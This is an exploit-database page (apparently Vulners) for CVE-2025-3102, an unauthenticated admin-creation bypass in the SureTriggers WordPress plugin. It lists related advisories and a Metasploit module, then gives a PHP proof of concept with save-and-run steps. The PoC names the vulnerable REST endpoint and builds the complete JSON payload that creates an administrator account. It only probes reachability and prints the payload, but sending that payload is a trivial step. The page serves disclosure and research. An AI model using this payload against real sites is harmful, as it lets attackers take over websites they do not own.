| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| Exploit for CVE-2025-3102 | 12 Apr 202504:22 | – | githubexploit | |
| Exploit for CVE-2025-3102 | 14 Apr 202516:07 | – | githubexploit | |
| Exploit for CVE-2025-3102 | 14 Apr 202510:20 | – | githubexploit | |
| Exploit for CVE-2025-3102 | 20 Apr 202513:59 | – | githubexploit | |
| Exploit for CVE-2025-3102 | 12 Apr 202504:22 | – | githubexploit | |
| CVE-2025-3102 | 10 Apr 202504:49 | – | circl | |
| WordPress plugin SureTriggers 安全漏洞 | 10 Apr 202500:00 | – | cnnvd | |
| CVE-2025-3102 | 10 Apr 202504:22 | – | cve | |
| CVE-2025-3102 SureTriggers <= 1.0.78 - Authorization Bypass due to Missing Empty Value Check to Unauthenticated Administrative User Creation | 10 Apr 202504:22 | – | cvelist | |
| WordPress SureTriggers (aka OttoKit) Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007) | 13 May 202518:49 | – | metasploit |
=============================================================================================================================================
| # Title : WordPress SureTriggers 1.0.78 Auth Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/suretriggers/ |
=============================================================================================================================================
[+] Summary :
The WordPress SureTriggers plugin versions <= 1.0.78 expose an
unauthenticated REST endpoint that allows construction of a user
creation payload. This POC demonstrates structure and logic only.
No admin account is created, no plugin uploaded
[+] References : ( https://packetstorm.news/files/id/192100/ CVE-2025-3102)
[+] Affected Product
- WordPress Plugin: SureTriggers
- Version: <= 1.0.78
[+] Vector
Unauthenticated REST access:
/wp-json/sure-triggers/v1/automation/action
[+] Research Notes
The endpoint accepts JSON payloads describing automation tasks.
In vulnerable versions, no authorization validation is performed
before processing the request. This POC validates reachability only.
--------------------------------------------------------------------
### SAFE PHP POC
--------------------------------------------------------------------
<?php
$target = "http://example.com";
$wp_user = "poc_admin";
$wp_pass = "StrongPass123!";
$wp_email = "[email protected]";
$create_url = $target . "/wp-json/sure-triggers/v1/automation/action";
$payload = [
"integration" => "WordPress",
"type_event" => "create_user_if_not_exists",
"selected_options" => [
"user_name" => $wp_user,
"password" => $wp_pass,
"user_email" => $wp_email,
"role" => "administrator"
],
"fields" => [],
"context" => []
];
echo "[SAFE_POC] Endpoint: $create_url\n";
echo "[SAFE_POC] Would create: $wp_user : $wp_pass : $wp_email\n\n";
$headers = @get_headers($create_url);
if ($headers && strpos($headers[0], "200") !== false) {
echo "[CHECK] Endpoint reachable – further manual review required.\n";
} else {
echo "[CHECK] Endpoint unreachable or non-200.\n";
}
echo "\n[PAYLOAD_PREVIEW]\n";
echo json_encode($payload, JSON_PRETTY_PRINT) . "\n";
echo "\n[END] Safe PoC complete.\n";
?>
--------------------------------------------------------------------
### SAVE & RUN INSTRUCTIONS
--------------------------------------------------------------------
[1] Save file as:
suretriggers_poc.php
[2] Place under your web root:
Windows (XAMPP): C:\xampp\htdocs\
Linux (Apache): /var/www/html/
[3] Run via browser:
http://localhost/suretriggers_poc.php
OR from CLI:
php suretriggers_poc.php
--------------------------------------------------------------------
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation